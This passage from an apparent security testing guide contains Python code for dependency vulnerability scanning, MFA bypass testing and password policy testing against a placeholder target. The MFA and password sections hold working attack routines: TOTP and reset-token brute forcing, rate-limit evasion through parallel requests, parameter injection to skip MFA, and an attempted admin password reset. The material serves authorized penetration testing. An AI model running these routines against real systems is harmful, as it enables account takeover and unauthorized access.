if critical_vulns:
    print(f"\nCRITICAL VULNERABILITIES:")
    for vuln in critical_vulns[:5]:  # Show first 5
        print(f"  - {vuln.get('package')} {vuln.get('version')}: {vuln.get('vulnerability')}")

6.2 Software Composition Analysis (SCA) Integration

#!/usr/bin/env python3
"""
Advanced Software Composition Analysis (SCA) Integration
Combines multiple SCA tools and vulnerability databases
"""
import subprocess
import json
import xml.etree.ElementTree as ET
from pathlib import Path
import tempfile
import os

class AdvancedSCAIntegrator:
    def __init__(self, project_path):
        self.project_path = Path(project_path)
        self.results = {}
        
        # Tool configurations
        self.tools = {
            'owasp_dependency_check': {
                'command': 'dependency-check',
                'args': ['--scan', '.', '--format', 'JSON', '--out', 'dependency-check-report.json'],
                'report_file': 'dependency-check-report.json'
            },
            'snyk': {
                'command': 'snyk',
                'args': ['test', '--json'],
                'report_file': None  # Outputs to stdout
            },
            'trivy': {
                'command': 'trivy',
                'args': ['fs', '-f', 'json', '.'],
                'report_file': None  # Outputs to stdout
            },
            'npm_audit': {
                'command': 'npm',
                'args': ['audit', '--json'],
                'report_file': None  # Outputs to stdout
            },
            'pip_audit': {
                'command': 'pip-audit',
                'args': ['--format', 'json'],
                'report_file': None  # Outputs to stdout
            }
        }
    
    def run_all_sca_tools(self):
        """Run all configured SCA tools"""
        print(f"[*] Running SCA tools on {self.project_path}")
        
        for tool_name, config in self.tools.items():
            print(f"[*] Running {tool_name}...")
            
            try:
                result = self.run_tool(tool_name, config)
                self.results[tool_name] = result
                print(f"[+] {tool_name} completed successfully")
            except Exception as e:
                print(f"[-] {tool_name} failed: {e}")
                self.results[tool_name] = {'error': str(e)}
        
        # Merge and analyze results
        merged_results = self.merge_results()
        return merged_results
    
    def run_tool(self, tool_name, config):
        """Run individual SCA tool"""
        cmd = [config['command']] + config['args']
        
        # Change to project directory
        original_cwd = os.getcwd()
        os.chdir(self.project_path)
        
        try:
            # Run command
            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=300  # 5 minute timeout
            )
            
            if result.returncode != 0 and tool_name not in ['snyk', 'npm_audit']:
                # Some tools return non-zero on vulnerabilities found
                print(f"[-] {tool_name} returned {result.returncode}")
            
            # Parse output
            if config['report_file']:
                # Read from report file
                report_path = self.project_path / config['report_file']
                if report_path.exists():
                    with open(report_path) as f:
                        output = json.load(f)
                else:
                    output = {'error': 'Report file not found'}
            else:
                # Parse stdout
                try:
                    output = json.loads(result.stdout)
                except json.JSONDecodeError:
                    output = {'raw_output': result.stdout, 'stderr': result.stderr}
            
            return {
                'returncode': result.returncode,
                'stdout': result.stdout[:1000],  # First 1000 chars
                'stderr': result.stderr[:1000],
                'output': output
            }
        
        except subprocess.TimeoutExpired:
            return {'error': 'Timeout expired'}
        finally:
            os.chdir(original_cwd)
    
    def merge_results(self):
        """Merge results from multiple SCA tools"""
        merged_vulnerabilities = []
        
        # Extract vulnerabilities from each tool's output
        for tool_name, result in self.results.items():
            if 'output' in result and isinstance(result['output'], dict):
                vulnerabilities = self.extract_vulnerabilities(tool_name, result['output'])
                merged_vulnerabilities.extend(vulnerabilities)
        
        # Deduplicate and prioritize
        unique_vulns = self.deduplicate_vulnerabilities(merged_vulnerabilities)
        
        # Generate unified report
        report = {
            'summary': {
                'total_tools_run': len(self.results),
                'tools_successful': sum(1 for r in self.results.values() if 'error' not in r),
                'total_vulnerabilities': len(unique_vulns)
            },
            'tool_results': self.results,
            'vulnerabilities': unique_vulns
        }
        
        return report
    
    def extract_vulnerabilities(self, tool_name, output):
        """Extract vulnerabilities from tool-specific output format"""
        vulnerabilities = []
        
        if tool_name == 'owasp_dependency_check':
            # OWASP Dependency Check format
            if 'dependencies' in output:
                for dep in output['dependencies']:
                    if 'vulnerabilities' in dep:
                        for vuln in dep['vulnerabilities']:
                            vulnerabilities.append({
                                'tool': tool_name,
                                'source': 'dependency-check',
                                'dependency': dep.get('fileName', 'Unknown'),
                                'vulnerability': vuln.get('name', 'Unknown'),
                                'severity': vuln.get('severity', 'MEDIUM').upper(),
                                'description': vuln.get('description', ''),
                                'cvss_score': vuln.get('cvssv3', {}).get('baseScore', 0),
                                'cwe': vuln.get('cwe', ''),
                                'references': vuln.get('references', [])
                            })
        
        elif tool_name == 'snyk':
            # Snyk format
            if 'vulnerabilities' in output:
                for vuln in output['vulnerabilities']:
                    vulnerabilities.append({
                        'tool': tool_name,
                        'source': 'snyk',
                        'package': vuln.get('packageName', 'Unknown'),
                        'vulnerability': vuln.get('title', 'Unknown'),
                        'severity': vuln.get('severity', 'MEDIUM').upper(),
                        'description': vuln.get('description', ''),
                        'cvss_score': vuln.get('cvssScore', 0),
                        'cwe': vuln.get('identifiers', {}).get('CWE', []),
                        'references': vuln.get('references', [])
                    })
        
        elif tool_name == 'trivy':
            # Trivy format
            if 'Results' in output:
                for result in output['Results']:
                    if 'Vulnerabilities' in result:
                        for vuln in result['Vulnerabilities']:
                            vulnerabilities.append({
                                'tool': tool_name,
                                'source': 'trivy',
                                'package': vuln.get('PkgName', 'Unknown'),
                                'vulnerability': vuln.get('VulnerabilityID', 'Unknown'),
                                'severity': vuln.get('Severity', 'MEDIUM').upper(),
                                'description': vuln.get('Description', ''),
                                'cvss_score': vuln.get('CVSS', {}).get('nvd', {}).get('V3Score', 0),
                                'references': vuln.get('References', [])
                            })
        
        elif tool_name == 'npm_audit':
            # npm audit format
            if 'vulnerabilities' in output:
                for pkg_name, vuln_info in output['vulnerabilities'].items():
                    if 'via' in vuln_info:
                        for via in vuln_info['via']:
                            if isinstance(via, dict):  # Vulnerability object
                                vulnerabilities.append({
                                    'tool': tool_name,
                                    'source': 'npm-audit',
                                    'package': pkg_name,
                                    'vulnerability': via.get('title', 'Unknown'),
                                    'severity': via.get('severity', 'MEDIUM').upper(),
                                    'description': via.get('description', ''),
                                    'cvss_score': via.get('cvss', {}).get('score', 0),
                                    'references': via.get('urls', [])
                                })
        
        return vulnerabilities
    
    def deduplicate_vulnerabilities(self, vulnerabilities):
        """Remove duplicate vulnerabilities across tools"""
        unique_vulns = []
        seen_identifiers = set()
        
        for vuln in vulnerabilities:
            # Create unique identifier
            identifier = f"{vuln.get('package')}:{vuln.get('vulnerability')}"
            
            if identifier not in seen_identifiers:
                seen_identifiers.add(identifier)
                unique_vulns.append(vuln)
            else:
                # Update existing vulnerability with additional tool info
                for existing in unique_vulns:
                    if (existing.get('package') == vuln.get('package') and 
                        existing.get('vulnerability') == vuln.get('vulnerability')):
                        # Add tool to list if not already there
                        if 'detected_by' not in existing:
                            existing['detected_by'] = []
                        
                        if vuln.get('tool') not in existing['detected_by']:
                            existing['detected_by'].append(vuln.get('tool'))
        
        # Sort by severity (CRITICAL, HIGH, MEDIUM, LOW)
        severity_order = {'CRITICAL': 0, 'HIGH': 1, 'MEDIUM': 2, 'LOW': 3}
        unique_vulns.sort(key=lambda x: severity_order.get(x.get('severity', 'MEDIUM'), 4))
        
        return unique_vulns
    
    def generate_remediation_plan(self, vulnerabilities):
        """Generate remediation plan for vulnerabilities"""
        remediation = {
            'immediate_actions': [],
            'short_term_actions': [],
            'long_term_actions': []
        }
        
        for vuln in vulnerabilities:
            severity = vuln.get('severity', 'MEDIUM')
            
            action = {
                'vulnerability': vuln.get('vulnerability'),
                'package': vuln.get('package'),
                'severity': severity,
                'action': self.get_remediation_action(vuln)
            }
            
            if severity in ['CRITICAL', 'HIGH']:
                remediation['immediate_actions'].append(action)
            elif severity == 'MEDIUM':
                remediation['short_term_actions'].append(action)
            else:
                remediation['long_term_actions'].append(action)
        
        return remediation
    
    def get_remediation_action(self, vulnerability):
        """Get specific remediation action for vulnerability"""
        package = vulnerability.get('package', '')
        tool = vulnerability.get('tool', '')
        
        actions = []
        
        # Package manager specific actions
        if 'package.json' in package or tool == 'npm_audit':
            actions.append("Run 'npm audit fix' to automatically fix vulnerabilities")
            actions.append("Update package.json with fixed versions")
        
        elif 'requirements.txt' in package or 'Pipfile' in package:
            actions.append("Update requirements.txt/Pipfile with secure versions")
            actions.append("Run 'pip-audit' to identify fixes")
        
        elif 'pom.xml' in package or 'build.gradle' in package:
            actions.append("Update Maven/Gradle dependencies")
            actions.append("Use versions-maven-plugin for dependency management")
        
        # General actions
        actions.append("Review vulnerability details and assess impact")
        actions.append("Test updates in development environment before production")
        actions.append("Consider using dependency locking (package-lock.json, Pipfile.lock)")
        
        return actions

# Usage
sca = AdvancedSCAIntegrator("/path/to/your/project")
results = sca.run_all_sca_tools()

print(f"\n{'='*60}")
print("SOFTWARE COMPOSITION ANALYSIS RESULTS")
print(f"{'='*60}")
print(f"Tools Run: {results['summary']['total_tools_run']}")
print(f"Tools Successful: {results['summary']['tools_successful']}")
print(f"Total Vulnerabilities Found: {results['summary']['total_vulnerabilities']}")

# Generate remediation plan
remediation = sca.generate_remediation_plan(results['vulnerabilities'])

print(f"\nREMEDIATION PLAN")
print(f"{'='*60}")
print(f"\nImmediate Actions ({len(remediation['immediate_actions'])}):")
for action in remediation['immediate_actions'][:3]:  # Show first 3
    print(f"  - {action['package']}: {action['vulnerability']}")
    for step in action['action'][:2]:
        print(f"    * {step}")

print(f"\nShort Term Actions ({len(remediation['short_term_actions'])}):")
for action in remediation['short_term_actions'][:2]:
    print(f"  - {action['package']}: {action['vulnerability']}")

# Export results
with open('sca-report.json', 'w') as f:
    json.dump(results, f, indent=2)

with open('remediation-plan.json', 'w') as f:
    json.dump(remediation, f, indent=2)

print(f"\n[*] Reports saved to sca-report.json and remediation-plan.json")

Chapter 7: Identification & Authentication - Advanced Testing

7.1 Multi-Factor Authentication Bypass

#!/usr/bin/env python3
"""
Advanced MFA Bypass Testing Framework
Tests various MFA implementations for weaknesses
"""
import requests
import time
import pyotp
import re
from typing import Dict, List
from urllib.parse import urljoin, urlparse

class MFABypassTester:
    def __init__(self, base_url, session_cookies=None):
        self.base_url = base_url
        self.session = requests.Session()
        if session_cookies:
            self.session.cookies.update(session_cookies)
        
        # MFA bypass techniques
        self.techniques = {
            'backup_code_reuse': self.test_backup_code_reuse,
            'mfa_code_replay': self.test_code_replay,
            'mfa_timeout_bypass': self.test_timeout_bypass,
            'session_fixation_mfa': self.test_session_fixation,
            'api_endpoint_bypass': self.test_api_endpoint_bypass,
            'response_manipulation': self.test_response_manipulation,
            'rate_limit_bypass': self.test_rate_limit_bypass
        }
    
    def test_backup_code_reuse(self):
        """Test if backup codes can be reused"""
        findings = []
        
        # Scenario: Backup codes should be single-use
        test_cases = [
            {'code': '12345678', 'expected': 'should fail on second use'},
            {'code': '87654321', 'expected': 'should fail on second use'}
        ]
        
        for test in test_cases:
            backup_code = test['code']
            
            # First use
            response1 = self.submit_backup_code(backup_code)
            
            if response1.status_code == 200:
                # Immediately try second use
                response2 = self.submit_backup_code(backup_code)
                
                if response2.status_code == 200:
                    findings.append({
                        'technique': 'backup_code_reuse',
                        'vulnerability': 'Backup codes can be reused',
                        'code': backup_code,
                        'evidence': f'Code accepted twice: {backup_code}'
                    })
        
        return findings
    
    def test_code_replay(self):
        """Test if TOTP codes can be replayed"""
        findings = []
        
        # This requires timing and observation
        # Approach: Capture a valid code and try to reuse it
        
        # Simulate: Get current TOTP code (in real test, you'd capture this)
        # For demonstration, we'll use a known secret
        totp_secret = "JBSWY3DPEHPK3PXP"  # Example secret
        totp = pyotp.TOTP(totp_secret)
        current_code = totp.now()
        
        # Submit code
        response1 = self.submit_totp_code(current_code)
        
        if response1.status_code == 200:
            # Wait for next time interval
            time.sleep(31)  # TOTP codes typically valid for 30 seconds
            
            # Try same code again
            response2 = self.submit_totp_code(current_code)
            
            if response2.status_code == 200:
                findings.append({
                    'technique': 'mfa_code_replay',
                    'vulnerability': 'Expired TOTP codes can be replayed',
                    'evidence': f'Code {current_code} accepted after expiration'
                })
        
        return findings
    
    def test_timeout_bypass(self):
        """Test MFA timeout bypass"""
        findings = []
        
        # Test if MFA step times out or can be bypassed by waiting
        
        # 1. Start MFA process
        start_response = self.start_mfa_process()
        
        if start_response.status_code == 200:
            # 2. Wait longer than timeout (e.g., 5 minutes)
            print("[*] Waiting for MFA timeout (300 seconds)...")
            time.sleep(300)
            
            # 3. Try to submit code anyway
            test_code = '000000'
            response = self.submit_totp_code(test_code)
            
            if response.status_code == 200:
                findings.append({
                    'technique': 'mfa_timeout_bypass',
                    'vulnerability': 'MFA does not timeout',
                    'evidence': 'MFA code accepted after 5 minute delay'
                })
        
        return findings
    
    def test_session_fixation(self):
        """Test for MFA session fixation"""
        findings = []
        
        # 1. Get session before MFA
        session_before = self.get_session_state()
        
        # 2. Complete MFA
        self.complete_mfa()
        
        # 3. Get session after MFA
        session_after = self.get_session_state()
        
        # 4. Try to use pre-MFA session
        if session_before and session_after:
            if session_before != session_after:
                # Session changed after MFA (good)
                # Now try to use old session
                old_session_response = self.use_session(session_before)
                
                if old_session_response.status_code == 200:
                    findings.append({
                        'technique': 'session_fixation_mfa',
                        'vulnerability': 'Pre-MFA sessions remain valid',
                        'evidence': 'Old session accepted after MFA completion'
                    })
        
        return findings
    
    def test_api_endpoint_bypass(self):
        """Test for API endpoints that bypass MFA"""
        findings = []
        
        # Common API endpoints that might bypass MFA
        api_endpoints = [
            '/api/user/profile',
            '/api/account/settings',
            '/api/tokens/create',
            '/api/session/refresh',
            '/api/auth/verify',
            '/api/mfa/status',
            '/api/authenticated'
        ]
        
        for endpoint in api_endpoints:
            url = urljoin(self.base_url, endpoint)
            
            # Try to access without completing MFA
            response = self.session.get(url)
            
            if response.status_code == 200:
                # Check if endpoint returns sensitive data
                sensitive_indicators = ['email', 'phone', 'address', 'permissions', 'roles']
                response_text = response.text.lower()
                
                if any(indicator in response_text for indicator in sensitive_indicators):
                    findings.append({
                        'technique': 'api_endpoint_bypass',
                        'vulnerability': f'API endpoint bypasses MFA: {endpoint}',
                        'evidence': f'Endpoint {endpoint} accessible without MFA'
                    })
        
        return findings
    
    def test_response_manipulation(self):
        """Test MFA response manipulation"""
        findings = []
        
        # Capture MFA verification request
        mfa_request = {
            'url': urljoin(self.base_url, '/api/mfa/verify'),
            'method': 'POST',
            'headers': {
                'Content-Type': 'application/json'
            },
            'data': {
                'code': '123456',
                'device_id': 'test_device'
            }
        }
        
        # Test various response manipulations
        
        # 1. Change status code in response
        manipulated_responses = [
            {'status': 'success', 'verified': True},
            {'status': 'verified', 'mfa_passed': True},
            {'authenticated': True, 'mfa_complete': True},
            {'result': 'ok', 'code': 200}
        ]
        
        for manipulated_response in manipulated_responses:
            # This would require intercepting and modifying the response
            # For demonstration, we'll simulate
            print(f"[*] Testing response manipulation: {manipulated_response}")
        
        # 2. Test parameter manipulation
        parameters = ['verified', 'success', 'authenticated', 'status']
        
        for param in parameters:
            test_data = {'code': '123456', param: 'true'}
            response = self.session.post(
                mfa_request['url'],
                json=test_data,
                headers=mfa_request['headers']
            )
            
            if response.status_code == 200:
                try:
                    response_data = response.json()
                    if response_data.get('authenticated') or response_data.get('verified'):
                        findings.append({
                            'technique': 'response_manipulation',
                            'vulnerability': f'MFA bypass via parameter: {param}',
                            'evidence': f'Parameter {param}=true bypassed MFA'
                        })
                except:
                    pass
        
        return findings
    
    def test_rate_limit_bypass(self):
        """Test MFA rate limiting bypass"""
        findings = []
        
        # Test brute force protection
        test_codes = ['000000', '111111', '222222', '333333', '444444', 
                     '555555', '666666', '777777', '888888', '999999']
        
        successful_attempts = 0
        
        for code in test_codes:
            response = self.submit_totp_code(code)
            
            if response.status_code == 200:
                successful_attempts += 1
            
            # Small delay between attempts
            time.sleep(0.5)
        
        if successful_attempts > 3:
            findings.append({
                'technique': 'rate_limit_bypass',
                'vulnerability': 'Weak or no MFA rate limiting',
                'evidence': f'{successful_attempts}/10 invalid codes accepted'
            })
        
        # Test parallel requests bypass
        import concurrent.futures
        
        def attempt_code(code):
            return self.submit_totp_code(code)
        
        # Send multiple requests simultaneously
        with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
            futures = [executor.submit(attempt_code, code) for code in test_codes]
            
            parallel_success = 0
            for future in concurrent.futures.as_completed(futures):
                try:
                    response = future.result()
                    if response.status_code == 200:
                        parallel_success += 1
                except:
                    pass
        
        if parallel_success > 3:
            findings.append({
                'technique': 'rate_limit_bypass',
                'vulnerability': 'Rate limiting bypassed via parallel requests',
                'evidence': f'{parallel_success}/10 parallel invalid codes accepted'
            })
        
        return findings
    
    def run_all_tests(self):
        """Run all MFA bypass tests"""
        all_findings = []
        
        print("[*] Starting MFA bypass tests")
        
        for technique_name, technique_func in self.techniques.items():
            print(f"[*] Testing {technique_name}...")
            try:
                findings = technique_func()
                all_findings.extend(findings)
                print(f"[+] {technique_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {technique_name} failed: {e}")
        
        # Generate report
        report = {
            'total_findings': len(all_findings),
            'findings_by_technique': {},
            'findings_by_severity': {},
            'detailed_findings': all_findings
        }
        
        # Categorize findings
        for finding in all_findings:
            technique = finding.get('technique', 'unknown')
            if technique not in report['findings_by_technique']:
                report['findings_by_technique'][technique] = 0
            report['findings_by_technique'][technique] += 1
        
        return report
    
    # Helper methods (implement based on target application)
    def submit_backup_code(self, code):
        """Submit backup code to MFA endpoint"""
        url = urljoin(self.base_url, '/api/mfa/backup')
        return self.session.post(url, json={'code': code})
    
    def submit_totp_code(self, code):
        """Submit TOTP code to MFA endpoint"""
        url = urljoin(self.base_url, '/api/mfa/verify')
        return self.session.post(url, json={'code': code})
    
    def start_mfa_process(self):
        """Start MFA process"""
        url = urljoin(self.base_url, '/api/mfa/start')
        return self.session.post(url)
    
    def get_session_state(self):
        """Get current session state"""
        return self.session.cookies.get_dict()
    
    def complete_mfa(self):
        """Complete MFA process (simulated)"""
        url = urljoin(self.base_url, '/api/mfa/complete')
        return self.session.post(url)
    
    def use_session(self, session_cookies):
        """Use specific session cookies"""
        temp_session = requests.Session()
        temp_session.cookies.update(session_cookies)
        url = urljoin(self.base_url, '/api/user/profile')
        return temp_session.get(url)

# Usage
tester = MFABypassTester(
    "http://target.com",
    session_cookies={"SESSION": "your_session_id"}
)

report = tester.run_all_tests()

print(f"\n{'='*60}")
print("MFA BYPASS TESTING REPORT")
print(f"{'='*60}")
print(f"Total Findings: {report['total_findings']}")

if report['total_findings'] > 0:
    print(f"\nFindings by Technique:")
    for technique, count in report['findings_by_technique'].items():
        print(f"  {technique}: {count}")
    
    print(f"\nCRITICAL FINDINGS:")
    critical_findings = [f for f in report['detailed_findings'] 
                        if 'reuse' in f.get('vulnerability', '').lower() or 
                           'bypass' in f.get('vulnerability', '').lower()]
    
    for finding in critical_findings[:3]:
        print(f"  - {finding['vulnerability']}")
        print(f"    Evidence: {finding.get('evidence', '')[:100]}...")

7.2 Advanced Password Policy Testing

#!/usr/bin/env python3
"""
Advanced Password Policy Testing and Weakness Analysis
Tests password policies, reset mechanisms, and storage
"""
import requests
import re
import hashlib
import json
from typing import Dict, List
from urllib.parse import urljoin
import time

class PasswordPolicyTester:
    def __init__(self, base_url):
        self.base_url = base_url
        self.session = requests.Session()
        self.findings = []
    
    def test_password_complexity(self):
        """Test password complexity requirements"""
        findings = []
        
        test_passwords = [
            # Common weak passwords
            ('password', 'No complexity'),
            ('123456', 'No complexity'),
            ('qwerty', 'No complexity'),
            ('letmein', 'No complexity'),
            
            # Short passwords
            ('a', 'Too short'),
            ('ab', 'Too short'),
            ('abc', 'Too short'),
            ('abcd', 'Too short'),
            
            # Common patterns
            ('Password1', 'Common pattern'),
            ('Welcome1', 'Common pattern'),
            ('Summer2023', 'Common pattern'),
            ('Winter2023!', 'Common pattern'),
            
            # Sequential characters
            ('abcdefg', 'Sequential letters'),
            ('12345678', 'Sequential numbers'),
            ('qwertyui', 'Keyboard pattern'),
            ('asdfghjk', 'Keyboard pattern'),
            
            # Repetitive characters
            ('aaaaaa', 'Repeating characters'),
            ('111111', 'Repeating numbers'),
            ('ababab', 'Repeating pattern'),
            
            # Dictionary words
            ('dragon', 'Dictionary word'),
            ('sunshine', 'Dictionary word'),
            ('princess', 'Dictionary word'),
            ('football', 'Dictionary word'),
        ]
        
        registration_endpoint = urljoin(self.base_url, '/api/register')
        
        for password, reason in test_passwords:
            test_data = {
                'username': f'test_{int(time.time())}_{reason[:10]}',
                'email': f'test_{int(time.time())}@example.com',
                'password': password,
                'confirm_password': password
            }
            
            try:
                response = self.session.post(registration_endpoint, json=test_data)
                
                if response.status_code == 200:
                    findings.append({
                        'test': 'password_complexity',
                        'password': password,
                        'reason': reason,
                        'result': 'ACCEPTED (VULNERABLE)',
                        'evidence': f'Weak password "{password}" accepted during registration'
                    })
                else:
                    # Check error message
                    error_msg = response.text.lower()
                    if 'password' in error_msg and ('weak' in error_msg or 'strength' in error_msg):
                        findings.append({
                            'test': 'password_complexity',
                            'password': password,
                            'reason': reason,
                            'result': 'REJECTED (GOOD)',
                            'evidence': f'Weak password "{password}" rejected: {error_msg[:100]}'
                        })
            
            except Exception as e:
                findings.append({
                    'test': 'password_complexity',
                    'password': password,
                    'reason': reason,
                    'result': 'ERROR',
                    'evidence': str(e)
                })
            
            time.sleep(0.5)  # Rate limiting
        
        return findings
    
    def test_password_history(self):
        """Test password history/reuse policy"""
        findings = []
        
        # This test requires creating a user and changing password multiple times
        
        # Step 1: Create test user
        user_data = {
            'username': f'history_test_{int(time.time())}',
            'email': f'history_{int(time.time())}@example.com',
            'password': 'InitialPassword1!',
            'confirm_password': 'InitialPassword1!'
        }
        
        register_response = self.session.post(
            urljoin(self.base_url, '/api/register'),
            json=user_data
        )
        
        if register_response.status_code == 200:
            # Login
            login_response = self.session.post(
                urljoin(self.base_url, '/api/login'),
                json={
                    'email': user_data['email'],
                    'password': user_data['password']
                }
            )
            
            if login_response.status_code == 200:
                # Test password changes
                test_passwords = [
                    'NewPassword1!',
                    'AnotherPassword2@',
                    'InitialPassword1!'  # Try to reuse original
                ]
                
                for new_password in test_passwords:
                    change_response = self.session.post(
                        urljoin(self.base_url, '/api/change-password'),
                        json={
                            'current_password': user_data['password'],
                            'new_password': new_password,
                            'confirm_password': new_password
                        }
                    )
                    
                    if change_response.status_code == 200:
                        if new_password == 'InitialPassword1!':
                            findings.append({
                                'test': 'password_history',
                                'result': 'VULNERABLE',
                                'evidence': 'Previous password reused successfully'
                            })
                        else:
                            # Update current password for next iteration
                            user_data['password'] = new_password
                    else:
                        if new_password == 'InitialPassword1!':
                            error_msg = change_response.text.lower()
                            if 'previous' in error_msg or 'history' in error_msg:
                                findings.append({
                                    'test': 'password_history',
                                    'result': 'SECURE',
                                    'evidence': 'Password history enforced: ' + error_msg[:100]
                                })
        
        return findings
    
    def test_password_reset_mechanism(self):
        """Test password reset functionality for weaknesses"""
        findings = []
        
        # Test 1: Token predictability
        test_emails = [
            'test@example.com',
            'admin@target.com',
            'user@target.com'
        ]
        
        for email in test_emails:
            # Request password reset
            reset_request = self.session.post(
                urljoin(self.base_url, '/api/password/reset/request'),
                json={'email': email}
            )
            
            if reset_request.status_code == 200:
                # Check for information disclosure
                response_text = reset_request.text.lower()
                
                if 'exist' in response_text or 'not found' in response_text:
                    findings.append({
                        'test': 'password_reset_info_disclosure',
                        'email': email,
                        'result': 'VULNERABLE',
                        'evidence': 'Email existence disclosed in reset response'
                    })
        
        # Test 2: Reset token brute force
        # Generate predictable tokens
        predictable_tokens = [
            '000000', '111111', '123456', '654321',
            'abcdef', 'password', 'reset123'
        ]
        
        for token in predictable_tokens:
            reset_attempt = self.session.post(
                urljoin(self.base_url, '/api/password/reset/confirm'),
                json={
                    'token': token,
                    'new_password': 'NewPassword123!'
                }
            )
            
            if reset_attempt.status_code == 200:
                findings.append({
                    'test': 'password_reset_token_bruteforce',
                    'token': token,
                    'result': 'VULNERABLE',
                    'evidence': f'Predictable token accepted: {token}'
                })
        
        # Test 3: Token expiration
        # This would require capturing a valid token and testing after expiration
        # For demonstration, we'll note the test
        findings.append({
            'test': 'password_reset_token_expiration',
            'result': 'MANUAL_TEST_REQUIRED',
            'evidence': 'Manually test if reset tokens expire appropriately'
        })
        
        # Test 4: Account takeover via password reset
        # Attempt to reset password for another user
        takeover_attempt = self.session.post(
            urljoin(self.base_url, '/api/password/reset/request'),
            json={'email': 'admin@target.com'}
        )
        
        if takeover_attempt.status_code == 200:
            # Check if any verification is required
            response_text = takeover_attempt.text
            if 'sent' in response_text.lower() and 'email' in response_text.lower():
                findings.append({
                    'test': 'password_reset_account_takeover',
                    'result': 'POTENTIALLY_VULNERABLE',
                    'evidence': 'Password reset initiated for admin without additional verification'
                })
        
        return findings
    
    def test_password_storage(self):
        """Test for password storage weaknesses"""
        findings = []
        
        # This test requires access to the database or password hashes
        # We'll test what we can from the outside
        
        # Test 1: Check for password in URLs
        login_response = self.session.post(
            urljoin(self.base_url, '/api/login'),
            json={'email': 'test@example.com', 'password': 'testpassword'}
        )
        
        # Check if password appears in logs, URLs, or responses
        # (This would typically require server access or careful monitoring)
        
        # Test 2: Check for weak hashing (timing attack indication)
        # Measure response times for valid vs invalid passwords
        
        test_credentials = [
            ('realuser@example.com', 'realpassword'),
            ('realuser@example.com', 'wrongpassword'),
            ('nonexistent@example.com', 'anypassword')
        ]
        
        response_times = []
        
        for email, password in test_credentials:
            start_time = time.time()
            response = self.session.post(
                urljoin(self.base_url, '/api/login'),
                json={'email': email, 'password': password},
                timeout=5
            )
            elapsed = time.time() - start_time
            response_times.append((email, password[:3] + '...', elapsed))
            
            time.sleep(1)  # Rate limiting
        
        # Analyze timing differences
        if len(response_times) >= 2:
            valid_time = response_times[0][2]  # Real credentials
            invalid_time = response_times[1][2]  # Wrong password
            
            # Significant timing difference might indicate hash verification
            if abs(valid_time - invalid_time) > 0.1:  # 100ms difference
                findings.append({
                    'test': 'password_hash_timing',
                    'result': 'POTENTIAL_INDICATOR',
                    'evidence': f'Timing difference detected: {valid_time:.3f}s vs {invalid_time:.3f}s'
                })
        
        # Test 3: Check for password in error messages
        error_test = self.session.post(
            urljoin(self.base_url, '/api/login'),
            json={'email': '', 'password': ''}
        )
        
        error_text = error_test.text.lower()
        if 'password' in error_text and ('hash' in error_text or 'encrypt' in error_text):
            findings.append({
                'test': 'password_storage_info_disclosure',
                'result': 'VULNERABLE',
                'evidence': 'Password storage mechanism disclosed in error message'
            })
        
        return findings
    
    def test_account_lockout(self):
        """Test account lockout mechanisms"""
        findings = []
        
        test_email = f'lockout_test_{int(time.time())}@example.com'
        
        # Create test user
        register_data = {
            'username': f'lockout_{int(time.time())}',
            'email': test_email,
            'password': 'ValidPassword1!',
            'confirm_password': 'ValidPassword1!'
        }
        
        register_response = self.session.post(
            urljoin(self.base_url, '/api/register'),
            json=register_data
        )
        
        if register_response.status_code == 200:
            # Attempt multiple failed logins
            failed_attempts = 0
            lockout_detected = False
            
            for i in range(15):  # Try 15 times
                login_response = self.session.post(
                    urljoin(self.base_url, '/api/login'),
                    json={'email': test_email, 'password': 'WrongPassword!'}
                )
                
                if login_response.status_code != 200:
                    failed_attempts += 1
                    
                    # Check for lockout message
                    response_text = login_response.text.lower()
                    if any(term in response_text for term in ['lock', 'disable', 'suspend', 'too many']):
                        lockout_detected = True
                        lockout_attempt = i + 1
                        break
                
                time.sleep(0.5)
            
            if lockout_detected:
                findings.append({
                    'test': 'account_lockout',
                    'result': 'SECURE',
                    'evidence': f'Account locked after {lockout_attempt} failed attempts'
                })
            else:
                findings.append({
                    'test': 'account_lockout',
                    'result': 'VULNERABLE',
                    'evidence': f'No lockout after {failed_attempts} failed attempts'
                })
        
        return findings
    
    def run_comprehensive_test(self):
        """Run all password policy tests"""
        print("[*] Starting comprehensive password policy testing")
        
        all_findings = []
        
        tests = [
            ('Password Complexity', self.test_password_complexity),
            ('Password History', self.test_password_history),
            ('Password Reset', self.test_password_reset_mechanism),
            ('Password Storage', self.test_password_storage),
            ('Account Lockout', self.test_account_lockout)
        ]
        
        for test_name, test_func in tests:
            print(f"[*] Running {test_name} test...")
            try:
                findings = test_func()
                all_findings.extend(findings)
                print(f"[+] {test_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {test_name} test failed: {e}")
        
        # Generate report
        report = self.generate_report(all_findings)
        return report
    
    def generate_report(self, findings):
        """Generate password policy test report"""
        report = {
            'total_tests': 5,
            'total_findings': len(findings),
            'findings_by_severity': self.categorize_findings(findings),
            'findings_by_test': {},
            'detailed_findings': findings,
            'recommendations': self.generate_recommendations(findings)
        }
        
        # Group findings by test
        for finding in findings:
            test_type = finding.get('test', 'unknown')
            if test_type not in report['findings_by_test']:
                report['findings_by_test'][test_type] = 0
            report['findings_by_test'][test_type] += 1
        
        return report
    
    def categorize_findings(self, findings):
        """Categorize findings by severity"""
        categories = {
            'CRITICAL': [],
            'HIGH': [],
            'MEDIUM': [],
            'LOW': [],
            'INFO': []
        }
        
        for finding in findings:
            result = finding.get('result', '')
            
            if 'VULNERABLE' in result:
                # Determine severity based on test type
                test_type = finding.get('test', '')
                
                if 'reset' in test_type.lower() or 'takeover' in test_type.lower():
                    categories['CRITICAL'].append(finding)
                elif 'lockout' in test_type.lower() or 'history' in test_type.lower():
                    categories['HIGH'].append(finding)
                elif 'complexity' in test_type.lower():
                    categories['MEDIUM'].append(finding)
                else:
                    categories['LOW'].append(finding)
            elif 'SECURE' in result:
                categories['INFO'].append(finding)
            else:
                categories['INFO'].append(finding)
        
        return {k: len(v) for k, v in categories.items()}
    
    def generate_recommendations(self, findings):
        """Generate security recommendations based on findings"""
        recommendations = []
        
        vulnerable_tests = [f for f in findings if 'VULNERABLE' in f.get('result', '')]
        
        if any('password_complexity' in f.get('test', '') for f in vulnerable_tests):
            recommendations.append({
                'priority': 'HIGH',
                'recommendation': 'Implement stronger password complexity requirements',
                'details': [
                    'Minimum 12 characters',
                    'Require mix of uppercase, lowercase, numbers, and special characters',
